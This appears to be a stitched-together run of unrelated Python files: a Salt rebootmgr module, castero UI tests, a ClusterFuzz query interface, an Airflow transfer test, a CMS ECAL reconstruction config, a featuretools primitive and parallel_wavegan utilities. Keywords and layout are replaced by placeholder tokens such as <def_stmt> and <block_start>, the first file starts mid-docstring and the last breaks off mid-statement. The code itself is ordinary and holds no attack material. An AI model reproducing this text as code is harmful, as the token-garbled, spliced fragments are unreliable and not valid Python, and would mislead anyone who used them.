Group name CLI Example: .. code-block:: bash salt microos rebootmgr set_max 4 """<line_sep>cmd=["rebootmgrctl" "set-max"]<if_stmt>group<block_start>cmd.extend(["--group" group])<block_end>cmd.append(max_locks)<line_sep><return>_cmd(cmd)<block_end><def_stmt>lock machine_id=<none> group=<none><block_start>"""Lock a machine. If no group is specified, the local default group will be used. If no machine-id is specified, the local machine will be locked. machine_id The machine-id is a network wide, unique ID. Per default the ID from /etc/machine-id is used. group Group name CLI Example: .. code-block:: bash salt microos rebootmgr lock group=group1 """<line_sep>cmd=["rebootmgrctl" "lock"]<if_stmt>group<block_start>cmd.extend(["--group" group])<block_end><if_stmt>machine_id<block_start>cmd.append(machine_id)<block_end><return>_cmd(cmd)<block_end><def_stmt>unlock machine_id=<none> group=<none><block_start>"""Unlock a machine. If no group is specified, the local default group will be used. If no machine-id is specified, the local machine will be locked. machine_id The machine-id is a network wide, unique ID. Per default the ID from /etc/machine-id is used. group Group name CLI Example: .. code-block:: bash salt microos rebootmgr unlock group=group1 """<line_sep>cmd=["rebootmgrctl" "unlock"]<if_stmt>group<block_start>cmd.extend(["--group" group])<block_end><if_stmt>machine_id<block_start>cmd.append(machine_id)<block_end><return>_cmd(cmd)<block_end>
<import_stmt>os<import_from_stmt>unittest mock<import_from_stmt>castero.config Config<import_from_stmt>castero.episode Episode<import_from_stmt>castero.feed Feed<import_from_stmt>castero.player Player<import_from_stmt>castero.queue Queue<line_sep>my_dir=os.path.dirname(os.path.realpath(__file__))<line_sep>feed=Feed(file=my_dir+"/feeds/valid_basic.xml")<line_sep>episode=Episode(feed title="episode title" description="episode description" link="episode link" pubdate="episode pubdate" copyright="episode copyright" enclosure="episode enclosure" )<line_sep>player1=Player("MLK Dream" my_dir+"/media/MLK_Dream_10s.mp3" episode)<line_sep>player2=Player("MLK Dream" my_dir+"/media/MLK_Dream_10s.mp3" episode)<line_sep>player3=Player("MLK Dream" my_dir+"/media/MLK_Dream_10s.mp3" episode)<line_sep>queue=Queue(mock.MagicMock())<line_sep>queue.add(player1)<line_sep>queue.add(player2)<def_stmt>get_queue_perspective display<block_start>"""Retrieve the Queue perspective. :param display the display containing the loaded perspective :returns Queue: the loaded Queue perspective """<line_sep>display._active_perspective=2<line_sep><return>display.perspectives[2]<block_end><def_stmt>test_perspective_queue_borders display<block_start>perspective=get_queue_perspective(display)<line_sep>display.display()<assert_stmt>perspective._queue_window.hline.call_count<eq>1<assert_stmt>perspective._queue_window.vline.call_count<eq>1<assert_stmt>perspective._metadata_window.hline.call_count<eq>1<line_sep>display._stdscr.reset_mock()<block_end><def_stmt>test_perspective_queue_display_episode_metadata display<block_start>perspective=get_queue_perspective(display)<line_sep>display._queue=queue<line_sep>perspective._draw_metadata=mock.MagicMock()<line_sep>display.display()<line_sep>perspective._draw_metadata.assert_called_with(perspective._metadata_window)<line_sep>display._stdscr.reset_mock()<block_end><def_stmt>test_perspective_queue_input_keys display<block_start>perspective=get_queue_perspective(display)<line_sep>display._queue=queue<line_sep>display._footer_window.getch=mock.MagicMock(return_value=10)<line_sep>ret_val=perspective.handle_input(ord("h"))<assert_stmt>ret_val<line_sep>display._stdscr.reset_mock()<line_sep>movement_keys=[display.KEY_MAPPING[Config["key_up"]] display.KEY_MAPPING[Config["key_right"]] display.KEY_MAPPING[Config["key_down"]] display.KEY_MAPPING[Config["key_left"]] display.KEY_MAPPING[Config["key_scroll_up"]] display.KEY_MAPPING[Config["key_scroll_down"]] ]<for_stmt>key movement_keys<block_start>perspective._metadata_updated=<true><line_sep>ret_val=perspective.handle_input(key)<assert_stmt>ret_val<assert_stmt><not>perspective._metadata_updated<block_end>operation_keys=[display.KEY_MAPPING[Config["key_delete"]] display.KEY_MAPPING[Config["key_remove"]] display.KEY_MAPPING[Config["key_reload"]] display.KEY_MAPPING[Config["key_reload_selected"]] display.KEY_MAPPING[Config["key_play_selected"]] display.KEY_MAPPING[Config["key_add_selected"]] display.KEY_MAPPING[Config["key_clear"]] display.KEY_MAPPING[Config["key_next"]] display.KEY_MAPPING[Config["key_pause_play"]] display.KEY_MAPPING[Config["key_pause_play_alt"]] display.KEY_MAPPING[Config["key_seek_forward"]] display.KEY_MAPPING[Config["key_seek_forward_alt"]] display.KEY_MAPPING[Config["key_seek_backward"]] display.KEY_MAPPING[Config["key_seek_backward_alt"]] display.KEY_MAPPING[Config["key_execute"]] ]<for_stmt>key operation_keys<block_start>ret_val=perspective.handle_input(key)<assert_stmt>ret_val<block_end>ret_val=perspective.handle_input(ord("q"))<assert_stmt><not>ret_val<line_sep>display._stdscr.reset_mock()<block_end><def_stmt>test_perspective_queue_draw_metadata display<block_start>perspective=get_queue_perspective(display)<line_sep>display.database.replace_feed(feed)<line_sep>display.database.replace_episodes(feed [episode])<line_sep>display.menus_valid=<false><line_sep>perspective._draw_metadata(perspective._metadata_window)<line_sep>perspective._draw_metadata(perspective._metadata_window)<block_end><def_stmt>test_perspective_queue_get_active_menu display<block_start>perspective=get_queue_perspective(display)<line_sep>perspective._active_window=0<assert_stmt>perspective._get_active_menu()<eq>perspective._queue_menu<block_end><def_stmt>test_perspective_queue_remove_selected_first display<block_start>perspective=get_queue_perspective(display)<line_sep>perspective._queue_menu=mock.MagicMock()<line_sep>perspective._queue_menu.item=player1<line_sep>queue1=Queue(display)<line_sep>queue1.add(player1)<line_sep>queue1.add(player2)<line_sep>queue1.add(player3)<line_sep>display._queue=queue1<line_sep>perspective._remove_selected_from_queue()<assert_stmt>queue1.first<eq>player2<assert_stmt>queue1.length<eq>2<block_end><def_stmt>test_perspective_queue_remove_selected_middle display<block_start>perspective=get_queue_perspective(display)<line_sep>perspective._queue_menu=mock.MagicMock()<line_sep>perspective._queue_menu.item=player2<line_sep>queue1=Queue(display)<line_sep>queue1.add(player1)<line_sep>queue1.add(player2)<line_sep>queue1.add(player3)<line_sep>display._queue=queue1<line_sep>perspective._remove_selected_from_queue()<assert_stmt>queue1.first<eq>player1<assert_stmt>queue1.length<eq>2<block_end>
# Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Represent the interface for Query. This is important because our access control logic needs a unified way to specify conditions for both BigQuery query and Datastore query. This must be compatible with libs.filters and libs.crash_access."""<class_stmt>Query(object)<block_start>"""Represent the interface for Query."""<def_stmt>filter self field value operator='='<block_start>"""Filter by a single value."""<line_sep><raise>NotImplementedError<block_end><def_stmt>filter_in self field values<block_start>"""Filter by multiple values."""<line_sep><raise>NotImplementedError<block_end><def_stmt>union self *queries<block_start>"""Union all queries with OR conditions."""<line_sep><raise>NotImplementedError<block_end><def_stmt>new_subquery self<block_start>"""Instantiate a query that is compatible with the current query."""<line_sep><raise>NotImplementedError<block_end><block_end>
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. <import_stmt>os<import_from_stmt>unittest mock<import_from_stmt>airflow.providers.google.cloud.transfers.gdrive_to_gcs GoogleDriveToGCSOperator<line_sep>FOLDER_ID=os.environ.get("GCP_GDRIVE_FOLDER_ID" "abcd1234")<line_sep>DRIVE_ID=os.environ.get("GCP_GDRIVE_DRIVE_ID" "abcd1234")<line_sep>FILE_NAME=os.environ.get("GCP_GDRIVE_TO_GCS_FILE_NAME" "gdrive_to_gcs_file.txt")<line_sep>BUCKET=os.environ.get("GCP_GDRIVE_TO_GCS_BUCKET" "gdrive-to-gcs-bucket")<line_sep>OBJECT="prefix/test.txt"<line_sep>GCP_CONN_ID="google_cloud_default"<line_sep>IMPERSONATION_CHAIN=["ACCOUNT_1" "ACCOUNT_2" "ACCOUNT_3"]<class_stmt>TestGoogleDriveToGCSOperator<block_start>@mock.patch("airflow.providers.google.cloud.transfers.gdrive_to_gcs.GCSHook")@mock.patch("airflow.providers.google.cloud.transfers.gdrive_to_gcs.GoogleDriveHook")<def_stmt>test_execute self mock_gdrive_hook mock_gcs_hook<block_start>context={}<line_sep>op=GoogleDriveToGCSOperator(task_id="test_task" folder_id=FOLDER_ID file_name=FILE_NAME drive_id=DRIVE_ID bucket_name=BUCKET object_name=OBJECT gcp_conn_id=GCP_CONN_ID impersonation_chain=IMPERSONATION_CHAIN )<line_sep>meta={"id":"123xyz"}<line_sep>mock_gdrive_hook.return_value.get_file_id.return_value=meta<line_sep>op.execute(context)<line_sep>mock_gdrive_hook.return_value.get_file_id.assert_called_once_with(folder_id=FOLDER_ID file_name=FILE_NAME drive_id=DRIVE_ID)<line_sep>mock_gdrive_hook.return_value.download_file.assert_called_once_with(file_id=meta["id"] file_handle=mock.ANY)<line_sep>mock_gcs_hook.return_value.provide_file_and_upload.assert_called_once_with(bucket_name=BUCKET object_name=OBJECT)<assert_stmt>op.dry_run()<is><none><block_end><block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>process=cms.Process("RECO2")<line_sep>process.load('Configuration.StandardSequences.Services_cff')<line_sep>process.load('FWCore.MessageService.MessageLogger_cfi')<line_sep>process.load('Configuration.EventContent.EventContent_cff')<line_sep>process.load('Configuration.StandardSequences.GeometryRecoDB_cff')<line_sep>process.load('Configuration.Geometry.GeometrySimDB_cff')<line_sep>process.load('Configuration.StandardSequences.MagneticField_cff')<line_sep>process.load('Configuration.StandardSequences.EndOfProcess_cff')<line_sep>process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")<line_sep>process.load('Configuration.StandardSequences.RawToDigi_cff')<line_sep>process.load('Configuration.StandardSequences.Reconstruction_cff')<line_sep>process.GlobalTag.globaltag='GR_R_74_V10A'<line_sep>process.GlobalTag.toGet=cms.VPSet(cms.PSet(record=cms.string("GeometryFileRcd") tag=cms.string("XMLFILE_Geometry_2015_72YV2_Extended2015ZeroMaterial_mc") connect=cms.untracked.string("frontier://FrontierProd/CMS_COND_GEOMETRY_000") # label = cms.untracked.string("Extended2015ZeroMaterial") ) cms.PSet(record=cms.string("EcalTBWeightsRcd") tag=cms.string("EcalTBWeights_3p5_time_mc") connect=cms.untracked.string("frontier://FrontierPrep/CMS_COND_ECAL")))<line_sep>#### CONFIGURE IT HERE isMC=<true><line_sep>##################### process.MessageLogger.cerr.FwkReport.reportEvery=1<line_sep># start from RAW format for more flexibility process.raw2digi_step=cms.Sequence(process.RawToDigi)<line_sep># get uncalibrechits with global method / time from ratio <import_stmt>RecoLocalCalo.EcalRecProducers.ecalGlobalUncalibRecHit_cfi<line_sep>process.ecalGlobalUncalibRecHit=RecoLocalCalo.EcalRecProducers.ecalGlobalUncalibRecHit_cfi.ecalGlobalUncalibRecHit.clone()<line_sep># get uncalib rechits from multifit method / time from ratio <import_stmt>RecoLocalCalo.EcalRecProducers.ecalMultiFitUncalibRecHit_cfi<line_sep>process.ecalMultiFitUncalibRecHit=RecoLocalCalo.EcalRecProducers.ecalMultiFitUncalibRecHit_cfi.ecalMultiFitUncalibRecHit.clone()<line_sep>process.ecalMultiFitUncalibRecHit.algoPSet.activeBXs=cms.vint32(-5 -4 -3 -2 -1 0 1 2 3 4)<line_sep>process.ecalMultiFitUncalibRecHit.algoPSet.useLumiInfoRunHeader=cms.bool(<false>)<line_sep># get uncalib rechits from multifit method / time from weights process.ecalMultiFit2UncalibRecHit=RecoLocalCalo.EcalRecProducers.ecalMultiFitUncalibRecHit_cfi.ecalMultiFitUncalibRecHit.clone()<line_sep>process.ecalMultiFit2UncalibRecHit.algoPSet.timealgo=cms.string("WeightsMethod")<line_sep>process.ecalMultiFit2UncalibRecHit.algoPSet.activeBXs=cms.vint32(-5 -4 -3 -2 -1 0 1 2 3 4)<line_sep>process.ecalMultiFit2UncalibRecHit.algoPSet.useLumiInfoRunHeader=cms.bool(<false>)<line_sep># get the recovered digis <if_stmt>isMC<block_start>process.ecalDetIdToBeRecovered.ebSrFlagCollection='simEcalDigis:ebSrFlags'<line_sep>process.ecalDetIdToBeRecovered.eeSrFlagCollection='simEcalDigis:eeSrFlags'<line_sep>process.ecalRecHit.recoverEBFE=<false><line_sep>process.ecalRecHit.recoverEEFE=<false><line_sep>process.ecalRecHit.killDeadChannels=<false><line_sep>process.ecalRecHit.ebDetIdToBeRecovered=''<line_sep>process.ecalRecHit.eeDetIdToBeRecovered=''<line_sep>process.ecalRecHit.ebFEToBeRecovered=''<line_sep>process.ecalRecHit.eeFEToBeRecovered=''<block_end>process.ecalRecHitGlobal=process.ecalRecHit.clone()<line_sep>process.ecalRecHitGlobal.EBuncalibRecHitCollection='ecalGlobalUncalibRecHit:EcalUncalibRecHitsEB'<line_sep>process.ecalRecHitGlobal.EEuncalibRecHitCollection='ecalGlobalUncalibRecHit:EcalUncalibRecHitsEE'<line_sep>process.ecalRecHitGlobal.EBrechitCollection='EcalRecHitsGlobalEB'<line_sep>process.ecalRecHitGlobal.EErechitCollection='EcalRecHitsGlobalEE'<line_sep>process.ecalRecHitMultiFit=process.ecalRecHit.clone()<line_sep>process.ecalRecHitMultiFit.EBuncalibRecHitCollection='ecalMultiFitUncalibRecHit:EcalUncalibRecHitsEB'<line_sep>process.ecalRecHitMultiFit.EEuncalibRecHitCollection='ecalMultiFitUncalibRecHit:EcalUncalibRecHitsEE'<line_sep>process.ecalRecHitMultiFit.EBrechitCollection='EcalRecHitsMultiFitEB'<line_sep>process.ecalRecHitMultiFit.EErechitCollection='EcalRecHitsMultiFitEE'<line_sep>process.ecalRecHitMultiFit2=process.ecalRecHit.clone()<line_sep>process.ecalRecHitMultiFit2.EBuncalibRecHitCollection='ecalMultiFit2UncalibRecHit:EcalUncalibRecHitsEB'<line_sep>process.ecalRecHitMultiFit2.EEuncalibRecHitCollection='ecalMultiFit2UncalibRecHit:EcalUncalibRecHitsEE'<line_sep>process.ecalRecHitMultiFit2.EBrechitCollection='EcalRecHitsMultiFit2EB'<line_sep>process.ecalRecHitMultiFit2.EErechitCollection='EcalRecHitsMultiFit2EE'<line_sep>process.maxEvents=cms.untracked.PSet(input=cms.untracked.int32(1000))<line_sep>path='/store/data/Run2012D/DoubleElectron/RAW-RECO/ZElectron-22Jan2013-v1/10000/'<line_sep>process.source=cms.Source("PoolSource" duplicateCheckMode=cms.untracked.string("noDuplicateCheck") fileNames=cms.untracked.vstring(path+'0008202C-E78F-E211-AADB-0026189437FD.root'))<line_sep>process.out=cms.OutputModule("PoolOutputModule" outputCommands=cms.untracked.vstring('drop *' 'keep *_ecalUncalib*_*_RECO2' 'keep *_ecalRecHit*_*_RECO2' 'keep *_offlineBeamSpot_*_*' 'keep *_addPileupInfo_*_*') fileName=cms.untracked.string('reco2_pu40.root'))<line_sep>process.ecalAmplitudeReco=cms.Sequence(process.ecalGlobalUncalibRecHit<times>process.ecalMultiFitUncalibRecHit<times>process.ecalMultiFit2UncalibRecHit)<line_sep>process.ecalRecHitsReco=cms.Sequence(process.ecalRecHitGlobal<times>process.ecalRecHitMultiFit<times>process.ecalRecHitMultiFit2)<line_sep>process.ecalTestRecoLocal=cms.Sequence(process.raw2digi_step<times>process.ecalAmplitudeReco<times>process.ecalRecHitsReco)<import_from_stmt>PhysicsTools.PatAlgos.tools.helpers *<line_sep>process.p=cms.Path(process.ecalTestRecoLocal)<line_sep>process.outpath=cms.EndPath(process.out)<line_sep>######################### # Time Profiling # ######################### #https://twiki.cern.ch/twiki/bin/viewauth/CMS/FastTimerService process.MessageLogger.cerr.FastReport=cms.untracked.PSet(limit=cms.untracked.int32(10000000))<line_sep># remove any instance of the FastTimerService <if_stmt>'FastTimerService'<in>process.__dict__<block_start><del_stmt>process.FastTimerService<block_end># instrument the menu with the FastTimerService process.load("HLTrigger.Timer.FastTimerService_cfi")<line_sep># print a text summary at the end of the job process.FastTimerService.printJobSummary=<true><line_sep># enable per-event DQM plots process.FastTimerService.enableDQM=<true><line_sep># enable per-module DQM plots process.FastTimerService.enableDQMbyModule=<true><line_sep># enable per-event DQM plots by lumisection process.FastTimerService.enableDQMbyLumiSection=<true><line_sep>process.FastTimerService.dqmLumiSectionsRange=2500# lumisections (23.31 s) # set the time resolution of the DQM plots process.FastTimerService.dqmTimeRange=1000.# ms process.FastTimerService.dqmTimeResolution=5.# ms process.FastTimerService.dqmPathTimeRange=100.# ms process.FastTimerService.dqmPathTimeResolution=0.5# ms process.FastTimerService.dqmModuleTimeRange=1000.# ms process.FastTimerService.dqmModuleTimeResolution=0.5# ms # set the base DQM folder for the plots process.FastTimerService.dqmPath="HLT/TimerService"<line_sep>process.FastTimerService.enableDQMbyProcesses=<true><line_sep># save the DQM plots in the DQMIO format process.dqmOutput=cms.OutputModule("DQMRootOutputModule" fileName=cms.untracked.string("DQM_pu40.root"))<line_sep>process.FastTimerOutput=cms.EndPath(process.dqmOutput)<line_sep>
<import_from_stmt>woodwork.column_schema ColumnSchema<import_from_stmt>featuretools.primitives.base AggregationPrimitive<class_stmt>CustomMean(AggregationPrimitive)<block_start>name="custom_mean"<line_sep>input_types=[ColumnSchema(semantic_tags={"numeric"})]<line_sep>return_type=ColumnSchema(semantic_tags={"numeric"})<block_end>
# -*- coding: utf-8 -*- # Copyright 2019 <NAME> # MIT License (https://opensource.org/licenses/MIT) """Utility functions."""<import_stmt>fnmatch<import_stmt>logging<import_stmt>os<import_stmt>sys<import_stmt>tarfile<import_from_stmt>distutils.version LooseVersion<import_from_stmt>filelock FileLock<import_stmt>h5py<import_stmt>numpy<as>np<import_stmt>torch<import_stmt>yaml<line_sep>PRETRAINED_MODEL_LIST={"ljspeech_parallel_wavegan.v1":"1PdZv37JhAQH6AwNh31QlqruqrvjTBq7U" "ljspeech_parallel_wavegan.v1.long":"1A9TsrD9fHxFviJVFjCk5W6lkzWXwhftv" "ljspeech_parallel_wavegan.v1.no_limit":"1CdWKSiKoFNPZyF1lo7Dsj6cPKmfLJe72" "ljspeech_parallel_wavegan.v3":"1-oZpwpWZMMolDYsCqeL12dFkXSBD9VBq" "ljspeech_melgan.v1":"1i7-FPf9LPsYLHM6yNPoJdw5Q9d28C-ip" "ljspeech_melgan.v1.long":"1x1b_R7d2561nqweK3FPb2muTdcFIYTu6" "ljspeech_melgan.v3":"1J5gJ_FUZhOAKiRFWiAK6FcO5Z6oYJbmQ" "ljspeech_melgan.v3.long":"124JnaLcRe7TsuAGh3XIClS3C7Wom9AU2" "ljspeech_full_band_melgan.v2":"1Kb7q5zBeQ30Wsnma0X23G08zvgDG5oen" "ljspeech_multi_band_melgan.v2":"1b70pJefKI8DhGYz4SxbEHpxm92tj1_qC" "ljspeech_hifigan.v1":"1i6-hR_ksEssCYNlNII86v3AoeA1JcuWD" "ljspeech_style_melgan.v1":"10aJSZfmCAobQJgRGio6cNyw6Xlgmme9-" "jsut_parallel_wavegan.v1":"1qok91A6wuubuz4be-P9R2zKhNmQXG0VQ" "jsut_multi_band_melgan.v2":"1chTt-76q2p69WPpZ1t1tt8szcM96IKad" "jsut_hifigan.v1":"1vdgqTu9YKyGMCn-G7H2fI6UBC_4_55XB" "jsut_style_melgan.v1":"1VIkjSxYxAGUVEvJxNLaOaJ7Twe48SH-s" "csmsc_parallel_wavegan.v1":"1QTOAokhD5dtRnqlMPTXTW91-CG7jf74e" "csmsc_multi_band_melgan.v2":"1G6trTmt0Szq-jWv2QDhqglMdWqQxiXQT" "csmsc_hifigan.v1":"1fVKGEUrdhGjIilc21Sf0jODulAq6D1qY" "csmsc_style_melgan.v1":"1kGUC_b9oVSv24vZRi66AAbSNUKJmbSCX" "arctic_slt_parallel_wavegan.v1":"1_MXePg40-7DTjD0CDVzyduwQuW_O9aA1" "jnas_parallel_wavegan.v1":"1D2TgvO206ixdLI90IqG787V6ySoXLsV_" "vctk_parallel_wavegan.v1":"1bqEFLgAroDcgUy5ZFP4g2O2MwcwWLEca" "vctk_parallel_wavegan.v1.long":"1tO4-mFrZ3aVYotgg7M519oobYkD4O_0-" "vctk_multi_band_melgan.v2":"10PRQpHMFPE7RjF-MHYqvupK9S0xwBlJ_" "vctk_hifigan.v1":"1oVOC4Vf0DYLdDp4r7GChfgj7Xh5xd0ex" "vctk_style_melgan.v1":"14ThSEgjvl_iuFMdEGuNp7d3DulJHS9Mk" "libritts_parallel_wavegan.v1":"1zHQl8kUYEuZ_i1qEFU6g2MEu99k3sHmR" "libritts_parallel_wavegan.v1.long":"1b9zyBYGCCaJu0TIus5GXoMF8M3YEbqOw" "libritts_multi_band_melgan.v2":"1kIDSBjrQvAsRewHPiFwBZ3FDelTWMp64" "libritts_hifigan.v1":"1_TVFIvVtMn-Z4NiQrtrS20uSJOvBsnu1" "libritts_style_melgan.v1":"1yuQakiMP0ECdB55IoxEGCbXDnNkWCoBg" "kss_parallel_wavegan.v1":"1mLtQAzZHLiGSWguKCGG0EZa4C_xUO5gX" "hui_acg_hokuspokus_parallel_wavegan.v1":"1irKf3okMLau56WNeOnhr2ZfSVESyQCGS" "ruslan_parallel_wavegan.v1":"1M3UM6HN6wrfSe5jdgXwBnAIl_lJzLzuI" }<def_stmt>find_files root_dir query="*.wav" include_root_dir=<true><block_start>"""Find files recursively. Args: root_dir (str): Root root_dir to find. query (str): Query to find. include_root_dir (bool): If False, root_dir name is not included. Returns: list: List of found filenames. """<line_sep>files=[]<for_stmt>root,dirnames,filenames os.walk(root_dir followlinks=<true>)<block_start><for_stmt>filename fnmatch.filter(filenames query)<block_start>files.append(os.path.join(root filename))<block_end><block_end><if_stmt><not>include_root_dir<block_start>files=[file_.replace(root_dir+"/" "")<for>file_ files]<block_end><return>files<block_end><def_stmt>read_hdf5 hdf5_name hdf5_path<block_start>"""Read hdf5 dataset. Args: hdf5_name (str): Filename of hdf5 file. hdf5_path (str): Dataset name in hdf5 file. Return: any: Dataset values. """<if_stmt><not>os.path.exists(hdf5_name)<block_start>logging.error(f"There is no such a hdf5 file ({hdf5_name}).")<line_sep>sys.exit(1)<block_end>hdf5_file=h5py.File(hdf5_name "r")<if_stmt>hdf5_path<not><in>hdf5_file<block_start>logging.error(f"There is no such a data in hdf5 file. ({hdf5_path})")<line_sep>sys.exit(1)<block_end>hdf5_data=hdf5_file[hdf5_path][()]<line_sep>hdf5_file.close()<line_sep><return>hdf5_data<block_end><def_stmt>write_hdf5 hdf5_name hdf5_path write_data is_overwrite=<true><block_start>"""Write dataset to hdf5. Args: hdf5_name (str): Hdf5 dataset filename. hdf5_path (str): Dataset path in hdf5. write_data (ndarray): Data to write. is_overwrite (bool): Whether to overwrite dataset. """<line_sep># convert to numpy array write_data=np.array(write_data)<line_sep># check folder existence folder_name,_=os.path.split(hdf5_name)<if_stmt><not>os.path.exists(folder_name)<and>len(folder_name)<ne>0<block_start>os.makedirs(folder_name)<block_end># check hdf5 existence <if_stmt>os.path.exists(hdf5_name)# if already exists, open with r+ mode <block_start>hdf5_file=h5py.File(hdf5_name "r+")<line_sep># check dataset existence <if_stmt>hdf5_path<in>hdf5_file<block_start><if_stmt>is_overwrite<block_start>logging.warning("Dataset in hdf5 file already exists. "<concat>"recreate dataset in hdf5.")<line_sep>hdf5_file.__delitem__(hdf5_path)<block_end><else_stmt><block_start>logging.error("Dataset in hdf5 file already exists. "<concat>"if you want to overwrite, please set is_overwrite = True.")<line_sep>hdf5_file.close()<line_sep>sys.exit(1)<block_end><block_end><block_end><else_stmt># if not exists, open with w mode <block_start>hdf5_file=h5py.File(hdf5_name "w")<block_end># write data to hdf5 hdf5_file.create_dataset(hdf5_path data=write_data)<line_sep>hdf5_file.flush()<line_sep>hdf5_file.close()<block_end><class_stmt>HDF5ScpLoader(object)<block_start>"""Loader class for a fests.scp file of hdf5 file. Examples: key1 /some/path/a.h5:feats key2 /some/path/b.h5:feats key3 /some/path/c.h5:feats key4 /some/path/d.h5:feats ... >>> loader = HDF5ScpLoader("hdf5.scp") >>> array = loader["key1"] key1 /some/path/a.h5 key2 /some/path/b.h5 key3 /some/path/c.h5 key4 /some/path/d.h5 ... >>> loader = HDF5ScpLoader("hdf5.scp", "feats") >>> array = loader["key1"] key1 /some/path/a.h5:feats_1,feats_2 key2 /some/path/b.h5:feats_1,feats_2 key3 /some/path/c.h5:feats_1,feats_2 key4 /some/path/d.h5:feats_1,feats_2 ... >>> loader = HDF5ScpLoader("hdf5.scp") # feats_1 and feats_2 will be concatenated >>> array = loader["key1"] """<def_stmt>__init__ self feats_scp default_hdf5_path="feats"<block_start>"""Initialize HDF5 scp loader. Args: feats_scp (str): Kaldi-style feats.scp file with hdf5 format. default_hdf5_path (str): Path in hdf5 file. If the scp contain the info, not used. """<line_sep>self.default_hdf5_path=default_hdf5_path<with_stmt>open(feats_scp)<as>f<block_start>lines=[line.replace("\n" "")<for>line f.readlines()]<block_end>self.data={}<for_stmt>line lines<block_start>key,value=line.split()<line_sep>self.data[key]=value<block_end><block_end><def_stmt>get_path self key<block_start>"""Get hdf5 file path for a given key."""<line_sep><return>self.data[key]<block_end><def_stmt>__getitem__ self key<block_start>"""Get ndarray for a given key."""<line_sep>p=self.data[key]<if_stmt>":"<in>p<block_start><if_stmt>len(p.split(","))<eq>1<block_start><return>read_hdf5(*p.split(":"))<block_end><else_stmt><block_start>p1,p2=p.split(":")<line_sep>feats=[read_hdf5(p1 p)<for>p p2.split(",")]<line_sep><return>np.concatenate([f<if>len(f.shape)<ne>1<else>f.reshape(-1 1)<for>f feats] 1)<block_end><block_end><else_stmt><block_start><return>read_hdf5(p self.default_hdf5_path)<block_end><block_end><def_stmt>__len__ self<block_start>"""Return the length of the scp file."""<line_sep><return>len(self.data)<block_end><def_stmt>__iter__ self<block_start>"""Return the iterator of the scp file."""<line_sep><return>iter(self.data)<block_end><def_stmt>keys self<block_start>"""Return the keys of the scp file."""<line_sep><return>self.data.keys()<block_end><def_stmt>values self<block_start>"""Return the values of the scp file."""<for_stmt>key self.keys()<block_start><yield>self[key]<block_end><block_end><block_end><class_stmt>NpyScpLoader(object)<block_start>"""Loader class for a fests.scp file of npy file. Examples: key1 /some/path/a.npy key2 /some/path/b.npy key3 /some/path/c.npy key4 /some/path/d.npy ... >>> loader = NpyScpLoader("feats.scp") >>> array = loader["key1"] """<def_stmt>__init__ self feats_scp<block_start>"""Initialize npy scp loader. Args: feats_scp (str): Kaldi-style feats.scp file with npy format. """<with_stmt>open(feats_scp)<as>f<block_start>lines=[line.replace("\n" "")<for>line f.readlines()]<block_end>self.data={}<for_stmt>line lines<block_start>key,value=line.split()<line_sep>self.data[key]=value<block_end><block_end><def_stmt>get_path self key<block_start>"""Get npy file path for a given key."""<line_sep><return>self.data[key]<block_end><def_stmt>__getitem__ self key<block_start>"""Get ndarray for a given key."""<line_sep><return>np.load(self.data[key])<block_end><def_stmt>__len__ self<block_start>"""Return the length of the scp file."""<line_sep><return>len(self.data)<block_end><def_stmt>__iter__ self<block_start>"""Return the iterator of the scp file."""<line_sep><return>iter(self.data)<block_end><def_stmt>keys self<block_start>"""Return the keys of the scp file."""<line_sep><return>self.data.keys()<block_end><def_stmt>values self<block_start>"""Return the values of the scp file."""<for_stmt>key self.keys()<block_start><yield>self[key]<block_end><block_end><block_end><def_stmt>load_model checkpoint config=<none> stats=<none><block_start>"""Load trained model. Args: checkpoint (str): Checkpoint path. config (dict): Configuration dict. stats (str): Statistics file path. Return: torch.nn.Module: Model instance. """<line_sep># load config if not provided <if_stmt>config<is><none><block_start>dirname=os.path.dirname(checkpoint)<line_sep>config=os.path.join(dirname "config.yml")<with_stmt>open(config)<as>f<block_start>config=yaml.load(f Loader=yaml.Loader)<block_end><block_end># lazy load for circular error <import_stmt>parallel_wavegan.models<line_sep># get model and load parameters model_class=getattr(parallel_wavegan.models config.get("generator_type" "ParallelWaveGANGenerator") )<line_sep># workaround for typo #295 generator_params={k.replace("upsample_kernal_sizes" "upsample_kernel_sizes"):v<for>k,v config["generator_params"].items()}<line_sep>model=model_class(**generator_params)<line_sep>model.load_state_dict(torch.load(checkpoint map_location="cpu")["model"]["generator"])<line_sep># check stats existence <if_stmt>stats<is><none><block_start>dirname=os.path.dirname(checkpoint)<if_stmt>config["format"]<eq>"hdf5"<block_start>ext="h5"<block_end><else_stmt><block_start>ext="npy"<block_end><if_stmt>os.path.exists(os.path.join(dirname f"stats.{ext}"))<block_start>stats=os.path.join(dirname f"stats.{ext}")<block_end><block_end># load stats <if_stmt>stats<is><not><none><block_start>model.register_stats(stats)<block_end># add pqmf if needed <if_stmt>config["generator_params"]["out_channels"]<g>1# lazy load for circular error <block_start><import_from_stmt>parallel_wavegan.layers PQMF<line_sep>pqmf_params={}<if_stmt>LooseVersion(config.get("version" "0.1.0"))<le>LooseVersion("0.4.2")# For compatibility, here we set default values in version <= 0.4.2 <block_start>pqmf_params.update(taps=62 cutoff_ratio=0.15 beta=9.0)<block_end>model.pqmf=PQMF(subbands=config["generator_params"]["out_channels"] **config.get("pqmf_params" pqmf_params) )<block_end><return>model<block_end><def_stmt>download_pretrained_model tag download_dir=<none><block_start>"""Download pretrained model form google drive. Args: tag (str): Pretrained model tag. download_dir (str): Directory to save downloaded files. Returns: str: Path of downloaded model checkpoint. """<assert_stmt>tag<in>PRETRAINED_MODEL_LIST f"{tag} does not 